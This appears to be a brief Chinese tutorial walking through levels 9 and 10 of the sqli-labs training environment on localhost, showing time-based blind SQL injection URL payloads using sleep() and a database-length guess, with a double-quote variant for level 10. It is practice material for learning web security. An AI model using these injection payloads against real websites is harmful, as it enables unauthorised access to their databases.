sqli-labs(9-10关)

第九关(Less-9):

  1.根据提示输入127.0.0.1/sqli-labs-master/Less-9/?id=1,回显正常

sqli-labs(9-10关)_第1张图片

  2.对sql注入漏洞进行判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1'回显正常

sqli-labs(9-10关)_第2张图片

  3.使用sleep函数进行sql注入漏洞判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) --+,经过5s回显正常,说明存在注入漏洞

sqli-labs(9-10关)_第3张图片

  4.通过Less-8中的时间盲注进行数据库长度的猜解,输入127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(length(database))=8,1,sleep(5)) --+,如果数据库长度为8,则返回较快。通过实验可知,返回较快,故当前数据库的长度为8

sqli-labs(9-10关)_第4张图片

  5.其余与Less-8中的猜解一样。

第十关(Less-10):

  127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(11)--+,Less-10只是将Less-9中的单引号变成双引号,其余的均相同。

sqli-labs(9-10关)_第5张图片

 

 

  

 

  

你可能感兴趣的:(sqli-labs(9-10关))